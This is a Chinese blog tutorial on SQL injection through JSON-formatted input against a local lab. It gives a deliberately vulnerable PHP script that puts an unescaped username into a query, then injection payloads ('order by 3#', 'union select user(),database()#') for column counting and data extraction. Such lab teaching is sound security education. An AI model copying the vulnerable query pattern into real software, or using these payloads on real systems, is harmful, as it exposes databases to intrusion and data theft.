linux json 写sql注入,sql注入之json注入(php代码)

最新推荐文章于 2024-08-27 18:30:00 发布
最新推荐文章于 2024-08-27 18:30:00 发布
阅读量784 收藏 1
点赞数
文章标签: linux json 写sql注入

环境

phpstudy

php服务端代码

security数据库中的users表中的username,password字段

用户名admin

JSON服务端代码

大家实际测试中注意修改相关的数据库名、表名、字段名等

// php防止中文乱码

header(‘content-type:text/html;charset=utf-8‘);

if(isset($_POST[‘json‘])){

$json_str=$_POST[‘json‘];

$json=json_decode($json_str);

if(!$json){

die(‘JSON文档格式有误,请检查‘);

}

$username=$json->username;

//$password=$json->password;

// 建立mysql连接,root/root连接本地数据库

$mysqli=new mysqli();

$mysqli->connect(‘localhost‘,‘root‘,‘root‘);

if($mysqli->connect_errno){

die(‘数据库连接失败:‘.$mysqli->connect_error);

}

// 要操作的数据库名,我的数据库是security

$mysqli->select_db(‘security‘);

if($mysqli->errno){

dir(‘打开数据库失败:‘.$mysqli->error);

}

// 数据库编码格式

$mysqli->set_charset(‘utf-8‘);

// 从users表中查询username,password字段

$sql="SELECT username,password FROM users WHERE username=‘{$username}‘";

$result=$mysqli->query($sql);

if(!$result){

die(‘执行SQL语句失败:‘.$mysqli->error);

}else if($result->num_rows==0){

die(‘查询结果为空‘);

}else {

$array1=$result->fetch_all(MYSQLI_ASSOC);

echo "用户名:{$array1[0][‘username‘]},密码:{$array1[0][‘password‘]}";

}

// 释放资源

$result->free();

$mysqli->close();

}

?>

进行注入

1、按照特定的数据格式查询admin用户密码

json={"username":"admin"}

20210507004829742069.png

2、查看源代码,构造payload

代码中的sql语句是这个样子的,构造payload进行注入

20210507004830038944.png

3、判断当前数据库有多少列

2正常,3报错,判断当前数据库有2列

json={"username":"admin‘ order by 3#"}

20210507004830101444.png

4、注入带出来数据

json={"username":"admin‘ and 1=2 union select 1,2#"}

20210507004830226444.png

json={"username":"admin‘ and 1=2 union select user(),database()#"}

20210507004830320194.png

接下来就是注入操作了,在此不做后续注入...

参考博客

原文:https://www.cnblogs.com/shley/p/14737017.html

噼里啪啦酱牛肉
关注
JsonSQL:用SQL语句解析JSON文件
06-19
用SQL语法,当然只能用简单的条件查询咯,不过这个用起比较简单,容易上手
json转换为SQL server建表脚本
09-17
在开发过程中,有时我们需要将JSON数据转化为SQL Server的建表脚本,以便在数据库中创建相应的表结构来存储这些数据。 标题"json转换为SQL server建表脚本"涉及到的主要知识点包括: 1. JSON解析:首先,你需要...
9-sql注入json注入
m0_62978778的博客
03-15 2274
JSON(JavaScriptObject Notation, JS对象简谱)是一种轻量级的数据交换格式。它基于ECMAScript(European Computer Manufacturers Association, 欧洲计算机协会制定的js规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。
SQL 注入新视角:堆查询、JSON 与头部 XFF 注入剖析及防范
最新发布
2301_77160226的博客
08-27 2325
在 SQL 注入攻击的世界中,除了一些常见的注入方式外,还有堆查询注入JSON 注入以及头部 XFF 注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞,对数据库安全构成严重威胁。本文将详细介绍这三种 SQL 注入攻击方式的原理和特点。
php还原json,PHP使用JSON和将json还原成数组,phpjson还原数组
weixin_31429257的博客
03-23 216
PHP使用JSON和将json还原成数组,phpjson还原数组在之前我php返回json数据简单实例,刚刚上网,突然发现一篇文章,也是介绍json的,还挺详细,值得参考。内容如下从5.2版本开始,PHP原生提供json_encode()和json_decode()函数,前者用于编码,后者用于解码。一、json_encode()复制代码 代码如下:$arr = array ('a'=>1...
sql注入
leekos的博客,分享web安全相关知识~
12-06 2235
sql提交注入
基于JSONSQL注入攻击触发需要更新Web应用程序防火墙
热门推荐
网络研究观
12-13 1万+
安全研究人员开发了一种通用的 SQL 注入技术,可以绕过多个 Web 应用程序防火墙 (WAF)。问题的核心是 WAF 供应商未能在 SQL 语句中添加对 JSON 的支持,从而使潜在的攻击者可以轻松隐藏其恶意负载。
mysql-querier:使用简单的JSON从MySQL查询,并防止SQL注入攻击
05-13
使用简单的JSON从MySQL查询,并防止SQL注入攻击 例子 querier = require 'mysql-querier' userQuerier = querier 'users', user_id: number: true role: enum: ['admin', 'user'] app.get '/user/query', (req, ...
Sql Server Json解析
12-18
sql server 2014 JSON解析到表函数 CREATE FUNCTION [dbo].[parseJSON]( @JSON NVARCHAR(MAX)) RETURNS @hierarchy TABLE ( element_id INT IDENTITY(1, 1) NOT NULL, ...
360天擎-前台sql注入1
08-03
根据给定的信息,本文将详细解释“360天擎-前台SQL注入1”的知识点,包括如何利用SQL注入漏洞在360天擎系统中执行恶意代码。 ### SQL注入漏洞概述 SQL注入是一种常见的Web安全漏洞,攻击者可以通过在应用程序输入...
SQL注入 SQL Injection
03-19
SQL注入的知识,SQL注入的知识, 国外的一本详细介绍了SQL注入的一本书
SQL注入
guangyinglanshan的博客
11-20 322
我想告诉你的是一个简单的技术,可以有效地用于现代Web应用程序,比如在NodeJS和MongoDB上编的应用程序。实质上,这种技术与SQL注入(SQLI)非常相似,虽然简单得多,因为我们不必完成任何奇怪和复杂的字符串。 在我继续之前,我想说的是,虽然我在谈论NodeJS,但在下面的示例中,我使用ExpressJS,它是最受欢迎的节点Web框架,也是NodeJS社区中的事实标准。
html sql注入_智能化扫描场景分析—精细化扫描SQL注入漏洞
weixin_39695241的博客
11-26 270
SQL注入漏洞,是攻击者对数据库进行攻击的常用手段之一,其本质是攻击者输入的数据可以被当做代码来执行,进而获取到数据库的控制权限。由于危险等级和出现频次常常较高,SQL注入漏洞正无时无刻不受到企业安全人员的重视。先来看以下几组数据。OWASP在2013年和2017年先后发布了两个版本的《Top 10 Web应用程序安全风险报告》,随着Web应用架构和技术的不断发展,应用程序的基础技术和结构发生了重...
sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))
weixin_34409822的博客
10-14 1737
2019独角兽企业重金招聘Python工程师标准>>> ...
sql注入攻击
qq_36030342的博客
09-07 967
比如 你的检测语句是 select * from user where name=‘“变量1”’ and password=‘变量2’ 如果能找到记录则判定登陆成功。 那么对方如果在填用户名和密码的时候 密码 1' or ’1‘='1 吧这个替换到 你最后形成的sql 语句就变成了 select * from user where name=‘ 1' or ‘1’='1’ an
php json mysql数据库中,使用PHP在MySQL数据库中插入JSON数据
weixin_31643625的博客
02-10 429
I tried to parse a JSON file using PHP.Then I would put the extracted data in a MySQL database.This is my JSON file{"u":[{"text":"Chef salad is calling my name, I\u0027m so hungry!","id_str":"28965131...
linux json sql注入,【网络安全】SQL注入、XML注入JSON注入和CRLF注入科普文
weixin_30567751的博客
05-19 245
[TOC]SQL注入所谓SQL注入,是将恶意SQL命令通过某种方式提交到服务器后台,并欺骗服务器执行这些恶意的SQL命令的一种攻击方式。 —— [ 百度百科 ] 造成SQL注入漏洞原因有两个:一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出)。一些寻找SQL漏洞的方法http://host/test.php?id=100 and 1=1 ...
json格式sql注入
09-15
JSON格式的SQL注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,而应用程序没有对这些不可信赖的数据进行验证和过滤。攻击者可以通过在JSON数据中插入恶意的SQL语句,来修改SQL查询的语义,进而对数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值